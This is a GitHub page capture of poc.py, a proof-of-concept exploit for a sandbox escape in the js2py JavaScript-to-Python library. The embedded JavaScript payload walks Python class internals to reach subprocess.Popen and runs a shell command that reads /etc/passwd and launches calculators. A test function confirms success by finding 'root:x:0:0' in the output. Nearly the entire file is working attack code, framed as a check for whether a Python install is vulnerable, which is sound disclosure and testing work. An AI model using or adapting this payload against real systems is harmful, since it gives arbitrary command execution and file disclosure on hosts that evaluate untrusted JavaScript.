-
Notifications
You must be signed in to change notification settings - Fork 6
/
poc.py
executable file
·50 lines (43 loc) · 1.2 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import js2py
from sys import version
payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator; kcalc; "
let hacked, bymarve, n11
let getattr, obj
hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__
function findpopen(o) {
let result;
for(let i in o.__subclasses__()) {
let item = o.__subclasses__()[i]
if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
return item
}
if(item.__name__ != "type" && (result = findpopen(item))) {
return result
}
}
}
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11
"""
def test_poc():
etcpassword_piece = "root:x:0:0"
result = ""
try:
result = repr(js2py.eval_js(payload))
except Exception:
return False
return etcpassword_piece in result
def main():
if test_poc():
print("Success! the vulnerability exists for python " + repr(version))
else:
print("Failed for python " + repr(version))
if __name__ == "__main__":
main()